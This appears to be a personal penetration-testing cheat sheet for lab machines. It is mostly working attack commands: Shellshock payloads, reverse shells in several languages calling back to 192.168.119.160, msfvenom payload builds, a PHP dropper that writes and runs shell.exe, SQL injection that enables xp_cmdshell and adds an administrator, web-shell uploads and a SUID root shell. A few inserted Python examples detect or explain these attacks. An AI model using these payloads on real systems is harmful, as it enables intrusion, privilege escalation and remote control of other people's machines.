Get Proof :
$ echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id:";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
0. Rules
Enumeration is the core of the work
> Look at everything really carefully.
If you try to approach everything at once you will miss things
> Always build a checklist and confirm items one by one.
When several vulnerabilities have been found, always list them up first and then work through them one at a time
> Often the approach is right but it fails because of a small mistake in usage.
It is a hair's-breadth difference. Check calmly.
Do not spend more than 15 minutes on any single vulnerability attempt.
1. RECONNAISSANCE - Information Gathering
1. Port Scanning
a. Light Scan :
$ sudo nmap 10.11.1.71 --top-ports 100 --open
b. Heavy Scan :
$ sudo nmap 10.11.1.71 -A -p- --reason --dns-servers <DNS-IP>
2. Services Scanning (Based on the nmap report)
a. Assuming port 22 is open
$ sudo nc -nv 10.11.1.71 22 > OS: Ubuntu / Package: 2ubuntu2 / Using: OpenSSH v6.6 / Overall : Ubuntu 14.04?
$ ssh root@10.11.1.71 > try connecting
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 bob@10.11.1.136
b. Assuming port 80 is open
$ curl -i 10.11.1.71
: Small Summary
- IP : 10.11.1.x
- Ports : 22 / 80
- OS : Ubuntu 14.4
- Services & Applications: OpenSSH 6.6 / Apache 2.4.7 & PHP 5.5.9
- Options left (in order of priority) : Explore the web app / Search for vulns in the known services & apps / Brute force
3. 'End User' Info Gathering : Web Application (main)
a. $ curl -i -L 10.11.1.71 (run this, then start up a GUI web browser to see what the page looks like as an 'end user')
$ curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' (check the web application's internal & external links)
$ curl 10.11.1.71 -s -L | html2text -width '77' | uniq (render the web application HTML)
b. Dig through every linked social account (Twitter & especially GitHub)
4. 'Hackers' Info Gathering Web Application (Hidden)
a. $ curl 10.11.1.71/robots.txt -s | html2text
b. URL Bruteforce (General) - Dirb / DirBuster / wfuzz / Gobuster
file list = /usr/share/seclists/, /usr/share/wordlists
$ gobuster dir -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,403,500' -e
$ gobuster dir -f -t 50 -x html,sh,pl -u http://10.11.1.115 -w /usr/share/wordlists/dirb/small.txt
c. Start researching vulnerabilities and issues in known software.
: Second Summary
1. Web Application - Bigtree CMS 4.0.6
2. Web Technologies - PHP 5.5.9
3. Web Server - Apache 2.4.7
4. SSH Service - OpenSSH 6.6
5. Database - MYSQL(Not sure on the version)
6. OS - Ubuntu (14.04? - Not sure on the version)
5. Search Exploits & CVEs
$ searchsploit OpenSSH 6 /
$ searchsploit Apache 2.4 | grep -v '/dos/'
$ searchsploit --colour -t php 5.x | grep -v '/dos/' | grep -vi '\.php'
$ searchsploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)'
$ searchsploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)' | \
grep -vi '/windows/\|PHP-Nuke\|RapidKill Pro\|Gift Registry\|Artiphp CMS'
$ searchsploit phpmyadmin | grep -v '/dos/'
$ searchsploit apache cgi | grep -v '/dos/'
2. EXPLOITATION
1. CGI (aka ShellShock)
a. $ curl -i http://10.11.1.71/cgi-bin/admin.cgi -s | html2text
LFI
$ curl 'http://10.11.1.71/cgi-bin/admin.cgi' -i -s > before
$ curl 'http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd' -i -s > after
$ diff before after
$ searchsploit apache cgi | grep -v '/dos/'
$ nikto -h 10.11.1.71 > look for CVE-2014-6271 in the results (if two or more CVEs appear for the same directory, it is a strong candidate)
b. Google : shellshock poc
: PoC Request
: $ curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
> If it prints, the vulnerability is present > then try adding a ; character as well
c. Target machine is vulnerable to shellshock. We have Remote Command Execution.
$ curl -H 'User-Agent: () { :; }; echo "+++++++++++++" ; /bin/bash -c whoami' http://10.11.1.71/cgi-bin/admin.cgi
$ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
$ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; nc -h 2>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}' (two spaces around nc -h)
Shell) $ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >&/dev/tcp/192.168.119.160/444 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
d. Searchsploit 34900.py
$ sudo python shellshock.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.160 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi
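As an added defender-side example (not part of the original notes), the Python below scans Apache combined-format access-log lines for the CVE-2014-6271 trigger pattern `() {` in the logged User-Agent and Referer values and for the `../` traversal probe sent to admin.cgi above. The log lines are constructed for this example; the regexes, field names and function names are this example's own choices.

```python
import re

# Constructed sample lines in Apache "combined" log format (not from the notes).
# The last quoted field is the User-Agent, which a CGI handler exports as HTTP_USER_AGENT.
SAMPLE_LOG = r'''
10.11.0.5 - - [10/Mar/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.0.9 - - [10/Mar/2021:10:00:02 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 213 "-" "() { :; }; /bin/bash -c id"
10.11.0.9 - - [10/Mar/2021:10:00:03 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 213 "-" "() {:;}; echo x"
10.11.0.7 - - [10/Mar/2021:10:00:04 +0000] "GET /cgi-bin/admin.cgi?list=../../../../etc/passwd HTTP/1.1" 200 1200 "-" "curl/7.68.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# CVE-2014-6271 trigger: an exported environment value that starts with a function definition "() {".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Directory traversal of the kind used in the admin.cgi?list= test above.
TRAVERSAL_RE = re.compile(r'(\.\./){2,}')


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(fields):
    """Return the list of finding kinds for one parsed line."""
    kinds = []
    req_parts = fields["req"].split()
    path = req_parts[1] if len(req_parts) >= 2 else fields["req"]
    # Only User-Agent and Referer are logged; a CGI exports every request header,
    # so Cookie and custom headers must be checked at the server or WAF instead.
    if SHELLSHOCK_RE.search(fields["ua"]) or SHELLSHOCK_RE.search(fields["ref"]):
        kinds.append("shellshock")
    if TRAVERSAL_RE.search(path):
        kinds.append("traversal")
    return kinds


def scan(log_text):
    """Scan many lines; return one finding dict per (line, kind) pair, in log order."""
    findings = []
    for raw in log_text.strip().splitlines():
        fields = parse_line(raw)
        if not fields:
            continue
        for kind in classify(fields):
            findings.append({"ip": fields["ip"], "req": fields["req"], "kind": kind})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:10} {f['ip']:12} {f['req']}")
```

A hit on `() {` in any header is worth an alert on its own, since no legitimate client sends that; the durable fix is a bash package that no longer imports function definitions from arbitrary environment variables, with the CGI handlers removed or restricted until it is applied.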
3. LINUX PRIVILEGE ESCALATION
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
z. export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
a. Information Gathering
a-1. Who are we?
$ id ; hostname ; hostname -I
a-2. Who uses the box? What users?
$ ls -l /etc/passwd > check user names, then SSH brute force
$ grep -vE "nologin|false" /etc/passwd
a-3. What's the OS? What version? What architecture?
$ cat /etc/*-release , uname -i
a-4. What's currently running on the box? What active network services are there?
$ ps aux , ps -ef , ps -eo command
$ netstat -antup (check whether mysql is running)
a-5. What's installed? What kernel is being used?
$ dpkg -l (Debian family) , rpm -qa (CentOS, openSUSE)
$ uname -a
a-6. Check list
$ ls -al /var
$ ls -al /opt
$ sudo -l (if ALL permissions, $ sudo su)
b. If a running service such as a DB was found in the information-gathering stage, move to its directory and gather information!
$ cd /var/www/html
$ find . -iname '*config*' -exec grep -H '$bigtree\["config"\]\["db"\]' {} +
*Important* The password may be a user's password and not only the MySQL one, so always check!
$ mysql -uroot -pzaq1xsw2cde3 -e 'show databases;' (when a connection fails because there is no interactive shell)
c. When there is a program under /var etc. that runs as a specific user (e.g. /var/OSSEC-2.8)
c-1. Check what it does via Google
c-2. Check for exploits via searchsploit ($ searchsploit ossec | grep -v '/dos/')
c-3. File transfer : wget or curl
$ curl 192.168.119.160/shell.pl > alpha-shell.pl
c-4. When looking for a command
$ whereis perl
c-5. Get into the habit of always running commands by absolute path.
$ /usr/bin/perl /tmp/alpha-shell.pl > when run, the guide says to fail an SSH login.
d. reverse shell
$ cp /usr/share/webshells/perl/perl-reverse-shell.pl alpha-shell.pl
$ sed -i 's/my $ip = .*;/my $ip = "192.168.119.160";/; s/my $port = .*;/my $port = 444;/' alpha-shell.pl
4. POST EXPLOITATION
a. Get proof.txt
b. Check User folders (# ls -lahR /home) > check "._history, .ssh, .php"
c. Check Hashes (# cat /etc/passwd)
d. Check Network Connection (# netstat -antp) (skip if already done)
e. Database (skip if already done)
Compile
$ i686-w64-mingw32-gcc bypass.c -o eventvwr.exe -lws2_32
* Display error *
Running GUI as another (non-root) user
: Fix for the "Can't open display" error when logged in as a non-root user
and running a program that needs a display.
Need to share authentication from user1.
# cat ~/.Xauthority | sudo -u OS-94404 -i tee .Xauthority > /dev/null
Offline Exploit Resources
1. Searchsploit
Path : /usr/share/exploitdb/exploits
2. Nmap NSE Scripts
Path : /usr/share/nmap/scripts
Usage : $ grep Exploits *.nse
$ nmap --script-help=clamav-exec.nse
3. Beef (The Browser Exploitation Framework) : password J~~bb
4. The Metasploit Framework
LFI
(https://shahrukhathar.info/local-file-inclusion-lfi-cheat-sheet/)
LFI vulnerability using a PHP wrapper
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
RFI
test :
test : $ nc -lvnp 7979
Target machine : /index.php?file=http://192.168.119.160:7979/test.txt
Attack
$ sudo python -m SimpleHTTPServer 80
$ weevely generate pass reverse.php
$ weevely http://10.11.1.35/section.php?page=http://192.168.119.160/reverse.php pass
RFI works, but
sometimes an automatic file extension is appended.
In that case you must find a way around it -> e.g. using (%00)..
Or use the PHP wrappers technique to force it into LFI
/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
RDP 3389 password brute force
$ crowbar --server 10.11.1.7/32 -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst
1. Reverse shell set http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
nc -e /bin/bash 192.168.119.160 443
bash -i >&/dev/tcp/192.168.119.160/443 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("192.168.119.160",443);exec("/bin/sh -i<&3 >&3 2>&3");'
/tmp # rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.160 443 >/tmp/f
callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication: system%0D%0AData: perl -MIO -e '%24p%3dfork%3bexit%2cif(%24p)%3b%24c%3dnew IO%3a%3aSocket%3a%3aINET(PeerAddr%2c"192.168.119.160%3a443")%3bSTDIN->fdopen(%24c%2cr)%3b%24~->fdopen(%24c%2cw)%3bsystem%24_ while<>%3b'%0D%0A%0D%0A
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo 'import socket,subprocess,os' > test.py
echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py
echo 's.connect(("10.10.14.13",8989))' >> test.py
echo 'os.dup2(s.fileno(),0)' >> test.py
echo 'os.dup2(s.fileno(),1)' >> test.py
echo 'os.dup2(s.fileno(),2)' >> test.py
echo 'p=subprocess.call(["/bin/sh","-i"])' >> test.py
+++ For a Windows reverse-shell upload file +++
attack.php
<?php
header('Content-type: text/plain');
$ip = "192.168.119.160"; //change this
$port = "443"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp"; // change to the upload path
chdir($tmpdir);
$res = "Using dir : ".$tmpdir;
$filename = "shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
++++Powershell reverse shell+++++
/home/OS-94404/labs/50/Invoke-PowerShellTcp.ps1
+One-Liner+
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.160',7979);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -exec bypass -ep bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.160',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -c '$client = New-Object System.Net.Sockets.TcpClient(\"192.168.119.160\",7979);
$stream = $client.GetStream();
[byte[]]$bytes=0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback = (iex $data 2>&1 | Out-String);
$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();'
2. SUID bit (root has to run the chown/chmod)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
After compiling, set the setuid bit
chown root:root /dev/shm/taku/takuattack; chmod 4755 /dev/shm/taku/takuattack
Running the file gives root
3. Broken terminal settings in vi
After getting in, run python -c import.. first, then work
When arrow keys etc. come out as garbage characters in the terminal (does not work in zsh)
$ Ctrl+Z to put it in the background
# stty raw -echo
# nc -lvnp 7979
Return to the foreground with fg + Enter
Case by case
LFI syntax
Windows
menu.php?file=c:\windows\system32\drivers\etc\hosts
debug.php?id=1 union all select 1, 2, "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>" into OUTFILE "c:/xampp/htdocs/backdoor.php"
When RFI is possible
use weevely
Payload & multi/handler
**** Linux ****
* non-staged
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f elf > non_staged.elf
* staged
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f elf > staged.elf
* meterpreter(staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f exe > meter_reverse.exe
**** Windows ****
* non-staged
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
* staged
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
* meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -e x86/shikata_ga_nai -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f powershell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o reverse_emb.exe
**** multi/handler ****
msfconsole -q -x "use exploit/multi/handler; set RHOST 192.168.160.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.160; exploit"
How to download files on Windows
1. powershell one-liner
after starting python -m SimpleHTTPServer
find the executable: where /r c:\windows powershell.exe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe')
++++ For command execution +++++
GET /?search=%00{.exec|C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.160:8000/Invoke-PowerShellTcp.ps1').} HTTP/1.1
++++ Download and run from PowerShell +++++++
IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.160:80/Sherlock.ps1')
+++ Windows PE ++++++ (folder 50) see IppSec Optimum : https://www.youtube.com/watch?v=kWTnVBIpNsE
Basic reverse shell script
> Invoke-PowerShellTcp.ps1 > set the IP and port at the very bottom
Vulnerability search script
> Sherlock.ps1 > add Find-AllVulns at the very bottom
If the MS16-032 vulnerability is present
> Invoke-MS16032.ps1
: add at the very bottom : Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.160:80/shell.ps1')"
: add shell.ps1 as a separate file (copy the Invoke-PowerShellTcp.ps1 above)
wordpress plugin upload
SQL injection (union based, Oracle)
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
https://guide.offsecnewbie.com/5-sql
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html
http://egloos.zum.com/totoriver/v/3012348
0. List Users
▶ 'or 1=1 union select name,null FROM master..syslogins--
1. Enumerate columns
'or 1=1 order by 3 --
2. Find type of columns (string or number)
'or 1=1 union select null,null,null from dual --
'or 1=1 union select '1111',null,null from dual --
'or 1=1 union select user,null,null from dual --
3. Extract table names
'or 1=1 union select table_name,null,null from all_tables --
'or 1=1 union select table_name,null FROM information_schema.tables --
4. Extract Column names:
'or 1=1 union select column_name,null from information_schema.columns where table_name='users' -- --
'or 1=1 union select column_name,null,null from all_tab_columns where table_name='WEB_ADMINS' --
5. Admin name and password :
'or 1=1 union select ADMIN_NAME,PASSWORD,PASSWORD,null from WEB_ADMINS --
▶ 'or 1=1 union select name,null from users --
▶ 'or 1=1 union select pass,null from users --
6. find injectable parameter with time delays
'or 1=1 ; WAITFOR DELAY '0:0:5' --
7.If 6 works, I can try to enable xp_cmdshell:
▶ 'or 1=1 ; Use master; --
▶ 'or 1=1 ; exec sp_configure 'show advanced options', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec sp_configure 'xp_cmdshell', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec master..xp_cmdshell 'net user OS-94404 password1! /add && net localgroup administrators OS-94404 /add'; --
8. Test logging in via RDP
**** SQL Injection ****
OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"];
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]; check table names
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"]; check the columns of that table
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"]; check user names
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"]; check passwords
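As an added example that is not part of the notes, the Python below (sqlite3, so it runs offline) shows why the UNION probes in steps 0-5 above and in the wp_users block work against a query built by string concatenation and do nothing against a parameterised one, and adds a minimal indicator regex of the kind a log reviewer or WAF rule would use. The schema, rows, probe string and function names are all constructed for this example.

```python
import re
import sqlite3


def make_db():
    """Constructed demo schema standing in for the products / wp_users tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'apple', 3), (2, 'pear', 4);
        CREATE TABLE users(id INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES (1, 'admin', 'HASH-PLACEHOLDER');
    """)
    return conn


def search_vulnerable(conn, term):
    """String concatenation: the user-supplied term becomes part of the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterised query: the term is bound as data and cannot change the statement."""
    return conn.execute(
        "SELECT id, name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


# Same shape as the probes above: three columns, matching what ORDER BY 3 would reveal.
UNION_PROBE = "' or 1=1 union select id, user_login, user_pass from users --"

# Indicator check for log review: UNION ... SELECT, a quote followed by a
# tautology, catalog tables, or a trailing comment terminator.
SQLI_RE = re.compile(
    r"union\s+(all\s+)?select|'\s*(or|and)\s+\d+\s*=\s*\d+|information_schema|all_tables|syslogins|--\s*$",
    re.IGNORECASE,
)


def looks_injected(term):
    """True when a parameter value carries the SQLi indicators above."""
    return bool(SQLI_RE.search(term))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PROBE))  # leaks the users row
    print("safe      :", search_safe(db, UNION_PROBE))        # empty result
    print("flagged   :", looks_injected(UNION_PROBE))
```

The concatenated version returns the two product rows plus the `users` row because the `'` closes the literal and `--` comments out the trailing quote; the bound version searches for a product literally named after the whole probe string. The regex is only a triage aid: parameterisation is the fix, and the indicator list should be extended with the dialect-specific names (`dual`, `all_tab_columns`, `WAITFOR DELAY`, `xp_cmdshell`) that appear in the notes above.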
**** Cracking the password *****
$ john --wordlist=/usr/share/wordlists/rockyou.txt new.txt
**** Plugin payload ****
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip cmd.zip plugin-shell.php
**** After uploading & activating New plugin ****
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 -f elf > shell2.elf
$ sudo python3 -m http.server 80
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=wget%20http://192.168.119.160/shell2.elf
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=chmod%20%2bx%20shell2.elf
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=./shell2.elf
**** upload portscan tool ****
$ cat portscan.sh
#!/bin/bash
host=10.5.5.11
for port in {1..65535};
do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"
meterpreter > upload /home/OS-94404/portscan.sh /tmp/portscan.sh
[*] uploading : /home/OS-94404/portscan.sh -> /tmp/portscan.sh
[*] Uploaded -1.00 B of 151.00 B (-0.66%): /home/OS-94404/portscan.sh -> /tmp/portscan.sh
[*] uploaded : /home/OS-94404/portscan.sh -> /tmp/portscan.sh
meterpreter >
**** SSH tunneling ****
+ Extra : basic ssh key sharing +
kali
$ ssh-keygen
$ cat id_rsa.pub and copy it: $ cat id_rsa.pub | xclip -selection clipboard
Paste it into authorized_keys on the compromised server
-Victim-
Check the /var/www/html/wp-config.php file : MariaDB username, password & DB IP address (check the IP)
$ mkdir keys
$ cd keys
$ ssh-keygen
> Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/key/id_rsa
$ cat id_rsa.pub
-kali-
$ cd /root/.ssh
$ cat authorized_keys
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoNVABbMB0Igk2Z+jBrWyUY6ivzRuHAOo0+RZYacce25IvNLAQCLh6UVOKJgyAsaRmIDIGdpGEegMsi70SpNifkZcYTq1k1AVDc5qrLhTmepKK19vcmmg2ckt0E+Yf5QChniRlltUcIF0QebNMuDnON5t2L+Dlbi4rUUGCFwyoly7PoeXVAs6RJ5YeWUdzeeiR+gOFe+QPsGEXr2DmX+R7Z6R4Ujrs83dbT8XgYkt3gAbYtih8sZoBO7thHY9swDDmEOQTSw/iFUDx4PYv0RudREGgMouaSOMHitSSxoe95CwLyEBVng/DnVI0ZpL6/J1JqYJMIPTG0QjbfdTzfsxd www-data@ajla
-Victim-
$ cat tunnel
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa OS-94404@192.168.119.160
-N : specify that we are not running any commands
-f : request ssh to go to the background
-R : remote port forward, [bind_port:]host:hostport (the port opens on the SSH server side and is forwarded back to host:hostport from the client side)
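As an added example, not part of the notes, the Python below parses authorized_keys entries written in the restricted style shown above (from=, command=, no-pty, ...) and reports which lock-down options each key lacks, so the receiving host can audit that a forwarding-only key really is forwarding-only. The sample file and the key material in it are constructed placeholders; KEY_TYPES, REQUIRED_OPTIONS and the function names are this example's own choices.

```python
KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}

# Options a forwarding-only key should carry (names compared case-insensitively).
REQUIRED_OPTIONS = {"from", "command", "no-pty", "no-agent-forwarding", "no-x11-forwarding"}

# Constructed sample file; the key blobs are placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = '''
# forwarding-only key in the same style as the entry above
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3PLACEHOLDER www-data@ajla

ssh-ed25519 AAAAC3PLACEHOLDER alice@laptop
no-pty ssh-rsa AAAAB3PLACEHOLDER2 mysql@zora
'''


def split_outside_quotes(text, sep_is_space):
    """Split on commas (or whitespace) that are not inside double quotes, honouring backslash escapes."""
    fields, cur, in_quotes, escaped = [], [], False, False
    for ch in text:
        if escaped:
            cur.append(ch)
            escaped = False
            continue
        if ch == "\\":
            cur.append(ch)
            escaped = True
            continue
        if ch == '"':
            in_quotes = not in_quotes
        is_sep = ch.isspace() if sep_is_space else ch == ","
        if is_sep and not in_quotes:
            if cur:
                fields.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        fields.append("".join(cur))
    return fields


def parse_entry(line):
    """Return (options dict, key type, comment) for one authorized_keys line, or None for blanks/comments."""
    fields = split_outside_quotes(line, sep_is_space=True)
    if not fields or fields[0].startswith("#"):
        return None
    options = {}
    if fields[0] not in KEY_TYPES:
        # The options field is everything before the key type, comma-separated.
        for opt in split_outside_quotes(fields.pop(0), sep_is_space=False):
            name, _, value = opt.partition("=")
            options[name.lower()] = value.strip('"')
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        return None
    return options, fields[0], " ".join(fields[2:])


def audit(text):
    """List each key with the lock-down options it is missing, in file order."""
    report = []
    for line in text.splitlines():
        parsed = parse_entry(line)
        if parsed is None:
            continue
        options, key_type, comment = parsed
        missing = sorted(REQUIRED_OPTIONS - set(options))
        report.append({"comment": comment, "type": key_type, "missing": missing})
    return report


if __name__ == "__main__":
    for entry in audit(SAMPLE_AUTHORIZED_KEYS):
        status = "ok" if not entry["missing"] else "missing " + ",".join(entry["missing"])
        print(f"{entry['type']:12} {entry['comment']:16} {status}")
```

Beyond the five options checked here, `permitopen=` and `permitlisten=` pin the hosts and ports a key may forward to or listen on, which is the natural next restriction for an account whose only job is to carry tunnels like the one in the notes.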
-Kali -
$ sudo netstat -tulpn
$ mysql --host=127.0.0.1 --port=13306 --user=wp -p
